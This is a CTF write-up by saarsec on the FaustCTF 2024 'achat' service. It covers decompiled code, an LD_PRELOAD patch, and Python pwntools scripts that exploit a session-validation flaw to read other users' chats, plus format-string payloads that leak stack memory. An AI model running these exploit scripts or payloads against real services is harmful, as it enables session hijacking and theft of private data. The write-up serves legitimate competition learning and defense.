Saarsec

saarsec

Schwenk and pwn

FaustCTF 2024 - achat

achat

achat (or asm_chat in the scoreboard) is a binary generated from C source code, which was a service from FaustCTF 2024. It features a simple chat system, where users can create chats with each other and send text messages. It has two vulnerabilities, of which only one is actually exploitable: a too lazy session check, and a combined buffer overflow/format string.

Service Overview

Users connect to achat on port tcp 1337. The protocol is plaintext-based, each command is one line. Some commands are available to everyone:

register <username> <password>
login <username> <password>
help
emojis

As a registered user, you have some more options:

start-chat <SessionID> <target_user>
send <SessionID> <chat_name> <message>
read <SessionID> <chat_name>
list <SessionID>
list-users <SessionID>
search <SessionID> <Query>

Login is handled by “sessions”, similar to what websites do. On login, you receive a “SessionID”. The binary keeps no state, you have to send this SessionID with every further command. Example usage:

nc fd66:666:1::2 1337
> $ register testuser secretpassword
< SessionID: 10581519230505672745
> $ start-chat 10581519230505672745 mkb
< Created the chat: 'mkb&testuser'.
> $ send 10581519230505672745 mkb&testuser Hi, this is a test message!
< send the Message:
< -------------------------------------------------
< Sun Sep 29 11:28:53 2024    testuser
< Hi, this is a test message!
> $ read 10581519230505672745 mkb&testuser                   
< Chat mkb&testuser:
< -------------------------------------------------
< Sun Sep 29 11:28:53 2024    testuser
< Hi, this is a test message!
> $ search 10581519230505672745 test
< Searched as testuser:
< In 'mkb&testuser': -------------------------------------------------
< Sun Sep 29 11:28:53 2024    testuser
< Hi, this is a test message!

The command list-users gives a list of all users, which is essentially a list of attack targets. You could also get the gameserver’s usernames from the flag IDs, but we couldn’t use them in our exploits, and relied on list-users instead.

Storage

achat stores its data in text-based files. The data directory looks like this:

.achat_data/
|- active_sessions
|- chats/
|  |- testuser&checkKLPPQlYmgyKUwPuY
|  \- mkb&testuser
\- users.db

users.db is a text file containing accounts with name and plaintext password, one per line. Format is <username>\t<password>\n:

mkb\tpassword\n
checkKLPPQlYmgyKUwPuY\taDAVMx\n
testuser\tsecretpassword\n

active_sessions is also a text file, containing session IDs and the respective username:

01186140060559298948\tcheckKLPPQlYmgyKUwPuY\n
10581519230505672745\ttestuser\n

Chats are stored in one text file per chat, with 3 lines per message:

-------------------------------------------------\n
Sun Sep 29 11:28:53 2024\ttestuser\n
Hi, this is a test message!\n

Some more advanced permission system is applied, so that you can append to each file, but neither remove nor overwrite content. We haven’t checked this in detail.

Vulnerability 1: Incorrect session validation

Session IDs are not properly validated. Here’s the decompiled and annotated function validate_session_id:

char *__fastcall validate_session_id(const char *sid) {
  char *result; // rax MAPDST
  char *sid_in_file; // [rsp+10h] [rbp-20h]
  char *session_file; // [rsp+18h] [rbp-18h]
  const char *username; // [rsp+20h] [rbp-10h]

  if ( strlen(sid) != 20 )
    return 0LL;
  session_file = read_in_file(".achat_data/active_sessions");
  if ( !session_file )
    return 0LL;
  sid_in_file = strstr(session_file, sid);      // search string sid in session file
  if ( !sid_in_file )
    goto not_found;
  while ( *sid_in_file != '\t' )                // go to next tab character
    ++sid_in_file;
  username = strtok(sid_in_file + 1, "\n");     // session belongs to the username after the tab
  if ( username )
  {
    result = strdup(username);
    free(session_file);
  }
  else
  {
not_found:
    free(session_file);
    result = 0LL;
  }
  return result;
}

First, this method ensures that the session ID is 20 characters (but not that it is numeric). Second, it searches for the session ID in the whole session file. Third, it advances to the next tab character, but does not check if that’s exactly 20 characters.

We can exploit this with a 20+ character username in the sessions file. If we enter that username to the session list, it will be accepted and this method returns the next session’s username instead (after advancing through our input, the \n and another irrelevant sid).

Normal algorithm operation:

...\n12345678901234567890\tusername1\n   // session file
     ↑                    ↑         ↑
   strstr result     after loop  end strtok // query "12345678901234567890"

=> return "username1"

Operation with long username as sid:

...\n11111222223333344444\talonglonglongusername\n55555666667777788888\tvictimuser\n...    // session file
                            ↑                                           ↑         ↑
                          strstr result                            after loop  end strtok  // query "longlonglongusername"

=> return "victimuser"

The Exploit

First, we list all users. Next, we attack with each username >= 20 characters. Using it as a session ID, we re-use the session that was first created after the user’s initial registration. The gameserver registers a lot of users with length 21, named check..., so we have plenty of targets here.

After hijacking a session, we can either list&read all chats, or use the search query to find flags in chats.

def exploit_session_validation(target):
    from pwn import remote
    conn = remote(target, 1337)
    conn.recvuntil(b'$')

    username = ''.join(random.choice(string.ascii_lowercase) for _ in range(16))
    password = ''.join(random.choice(string.ascii_lowercase) for _ in range(20))
    conn.sendline(f'register {username} {password}'.encode())
    sid = re.findall(r'\d{15,20}', conn.recvuntil(b'$').decode())[0]

    conn.sendline(f'list-users {sid}'.encode())
    data = conn.recvuntil(b'$')
    users = re.findall(r'> ([^\n]+)\n', data.decode())

    for user in users[::-1][:100]:  # attack newest 100 users
        # works only if username is at least 20 characters
        if len(user) < 20:
            continue
        
        # V1: list & read all chats
        conn.sendline(f'list {user[-20:]}'.encode())
        chats = re.findall(r'\t> ([^\n]+)\n', conn.recvuntil(b'$').decode())
        for chat in chats:
            conn.sendline(f'read {user[-20:]} {chat}'.encode())
            print(conn.recvuntil(b'$').decode())
        
        # V2: search for flags in all chats
        conn.sendline(f'search {user[-20:]} FAU'.encode())
        print(conn.recvuntil(b'$').decode())

Patching

Patching the binary wasn’t easy, so we used a preloaded library which filters in the strstr function. To this end, we ensured that any search query of length 20 must be numeric (which usernames cannot be). Note that this introduces a bug in the “search chats” feature - you cannot use search queries of length 20 anymore. But that didn’t happen, and the attacks stopped.

// musl-gcc -fPIC libpatch.c -shared -o libpatch.so
#include <string.h>

// replace libc strstr
char* strstr(const char* s1, const char* s2) {
    size_t len1 = strlen(s1);
    size_t len2 = strlen(s2);
    // validation always calls with sid len 20
    if (len2 == 20) {
        // ensure its purely numerical
        for (int i = 0; i < 20; i++) {
            if (s2[i] < '0' || s2[i] > '9') {
                return 0;
            }
        }
    }
    // use memmem s.t. I don't have to fetch the original strstr
    return memmem(s1, len1, s2, len2);
}

Finally we added this library to the binary, using LD_PRELOAD in the docker-compose file:

services:
  achat:
    # ...
    volumes:
      # ...
      - ./libpatch.so:/libpatch.so
    environment:
      LD_PRELOAD: "/libpatch.so"

A more advanced version of this patch method appeared in the Discord channel after the event.

(not exploitable) Vulnerability 2: Buffer Overflow into Format String

The function search_in_chat allocates two buffers on the stack (with alloca). One of them contains a format string. The other one might contain an arbitrary-length chat message, written there with unbound strcpy. We can overflow the chat message buffer (report_message in the decompiled code) and prepare a format string attack (targeting formatstring_on_stack).

Using this format string attack, we can leak pointers and leak a bit of stack memory. But due to the limits imposed on the user input, we cannot get arbitrary read/write, and thus, no remote code execution. The vulnerability was hard to spot for us because the decompiler messed up the stack allocations.

__int64 __fastcall search_in_chat(char *chat, char *query, char *username) {
  void *v3; // rsp
  void *v5; // rsp
  void *v6; // rsp
  size_t v7; // rax
  size_t v8; // rax
  size_t v9; // rax
  size_t v10; // rax
  size_t v11; // rax
  size_t v12; // rax
  __int64 v13; // r8
  __int64 v14; // r9
  char *chatcontent_tmp; // [rsp+28h] [rbp-48h]
  char *dest; // [rsp+30h] [rbp-40h]
  char *chatcontent; // [rsp+38h] [rbp-38h]
  char *formatstring_on_stack; // [rsp+40h] [rbp-30h]
  char *report_message; // [rsp+48h] [rbp-28h]
  char *msg_part1; // [rsp+50h] [rbp-20h]
  char *msg_part2; // [rsp+58h] [rbp-18h]
  char *msg_part3; // [rsp+60h] [rbp-10h]
  unsigned __int64 canary; // [rsp+68h] [rbp-8h]

  canary = __readfsqword(0x28u);
  // read the chat file
  dest = alloca(strlen(chat) + strlen(username) + ...)
  strcpy(dest, ".achat_data/chats/");
  strcat(dest, chat);
  chatcontent = read_in_file(dest);
  if ( !chatcontent )
    return 0xFFFFFFFFLL;
  formatstring_on_stack = alloca(272LL);  // we'll overflow into this buffer
  strcpy(formatstring_on_stack, "Searched as %ss:\nIn '%s': %s\n");
  chatcontent_tmp = chatcontent;
  report_message = alloca(272LL);         // we'll overflow this buffer
  while ( 1 ) {
    // each chat message is 3 lines, parse all 3
    msg_part1 = strtok(chatcontent_tmp, "\n");
    if ( !msg_part1 )
      break;
    chatcontent_tmp = 0LL;
    msg_part2 = strtok(0LL, "\n");
    if ( !msg_part2 )
      break;
    msg_part3 = strtok(0LL, "\n");
    if ( !msg_part3 )
      break;
    // concat all infos together in the report_message buffer
    strcpy(report_message, msg_part1);
    v7 = strlen(report_message);
    report_message[v7 + 1] = 0;
    v8 = strlen(report_message);
    report_message[v8] = '\n';
    strcat(report_message, msg_part2);
    v9 = strlen(report_message);
    report_message[v9 + 1] = 0;
    v10 = strlen(report_message);
    report_message[v10] = '\n';
    strcat(report_message, msg_part3);  // part3 is arbitrary length input, overflow happens here
    v11 = strlen(report_message);
    report_message[v11 + 1] = 0;
    v12 = strlen(report_message);
    report_message[v12] = '\n';
    // send concatted infos if chat message matches query
    if ( strstr(msg_part3, query) )
      send_msg(formatstring_on_stack, username, chat, report_message);  // printf-like format string invocation
  }
  free(chatcontent);
  return 0LL;
}

Leaking pointers

To trigger the vulnerability, we send a string like AAA...AAA%p%p%p...%p in a chat and then search for it. The A will fill up the original buffer (report_message), the %p will fill up the format string (formatstring_on_stack) and leak stack memory:

def search_for_chat_message(target, chatmsg: str) -> bytes:
    """Connect to the service, send a chat message, search for it, return result of search"""
    from pwn import remote
    conn = remote(target, 1337)

    username = ''.join(random.choice(string.ascii_lowercase) for _ in range(16))
    password = ''.join(random.choice(string.ascii_lowercase) for _ in range(20))
    conn.recvuntil(b'$')
    conn.sendline(f'register {username} {password}'.encode())
    sid = re.findall(r'\d{15,20}', conn.recvuntil(b'$').decode())[0]
    conn.sendline(f'start-chat {sid} mkb'.encode())
    chatname = re.findall(r"'(.*)'", conn.recvuntil(b'$').decode())[0]

    conn.sendline(f'send {sid} {chatname} {chatmsg}'.encode('latin-1'))
    conn.recvuntil(b'$')
    conn.sendline(f'search {sid} {chatmsg[:8]}'.encode())
    result = conn.recvuntil(b'$ ')
    conn.close()
    return result


def demo_leak_memory(target):
    chatmsg = 'A' * 180 + '%p' * 150  # <-- this is the payload
    result_binary = search_for_chat_message(target, chatmsg)
    result = result_binary.decode('latin-1').strip().replace('|', '\n').replace('0x', '\n0x')
    print(result)

If we run this script, we see plenty of interesting pointers. With more effort, we might determine which of them gives a stable binary offset (which, btw, is constant, because the binary forks for each connection).

0x729f933c9ce0      # sth close to libc (@ 0x729f93313000)
0x5a1ada9bc643      # binary, rw section
0x7ffd31fd6b800
0x8080808080808080
0x2d2d2d2d2d2d2d2d  # the other string buffers on stack
...                 # our string buffer on stack
0x7025702570257025
0x729f933c000a      # sth close to libc
0x1
0x7ffd31fd6e40
0x5a1ada9b92ef      # binary, code pointer
0x645f74616863612e
0x746168632f617461
0x6c637163796c2f73
0x636b7a6c61786d6a
0x626b6d266665
0x5a1ada9b926f      # binary, code pointer
0x7ffd31fd7128
0x729f933c9ce0      # sth close to libc
0x5a1ada9bc8ec      # binary, rw section
0x5a1ada9bc643      # binary, rw section
...

(almost) reading/writing memory

To read or write memory with printf, we need a target address on the stack, and a targeted formatter like %1$s or %1$hhnwhich read from or write to this address. But there are three problems here:

  1. The musl libc has a very limited printf. For example, the popular %123$p formatters don’t work. Thus, we have to build long format strings, and we can use each address on the stack only once.
  2. We cannot write 0x10 or 0x00 bytes in our buffer, which are required to write full target addresses (in memory, every address ends with two 0x00).
  3. Finally, our string is always terminated by a \n, so we cannot even get a single address in the buffer:
def demo_format_string(target):
    chatmsg = 'A' * 180 + '%p' * 55 + '|>>>%p<<<|' + '%p' * 4
    chatmsg += '\x08\xc0\x9b\xda\x1a\x5a'  # 0x5a1ada9bc000
    result_binary = search_for_chat_message(target, chatmsg)
    result = result_binary.decode('latin-1').strip().replace('|', '\n').replace('0x', '\n0x')
    print(result)
0x729f933c9ce0
0x729f9330e143
0x7ffd31fd6b800
0x8080808080808080
0x2d2d2d2d2d2d2d2d
...
0x4141414141414141
0x4141414141414141
...
0x7025702570257025
0x7025702570257025
0x7025702570257025
0x3e7c702570257025
0x7c3c3c3c70253e3e
0x7025702570257025
>>>0xa5a1ada9bc008<<<  # notice the leading "a", which was not part of our input
0x1000
0x8
0x66f9134d
0x57faec...

We wrote 0x5a1ada9bc008, but ended up with 0x0a5a1ada9bc008 on the stack. No mapped address starts with 0x0a, and we would likely need 3-4 addresses anyways, so we cannot use this vulnerability to read/write arbitrary memory.

Summary

achat was a nice and understandable binary. We got our exploit working 15 minutes after the network opened and scored first blood. Other teams started to exploit the same vulnerability later. However, at the end of the game, some teams had accumulated more points than we did, even though no other achat exploit had appeared on the network. We do not yet understand what happened there, because our exploit ran smoothly over the whole game. It was a bit sad to learn that the format string vulnerability is not exploitable, after spending so many hours on it. The author later confirmed that he hadn’t tested it. From a strategic point of view, we would have gotten more points if we spent that time on other services instead. But overall, this was a nice challenge with a medium and a harder vulnerability, and I enjoyed it a lot.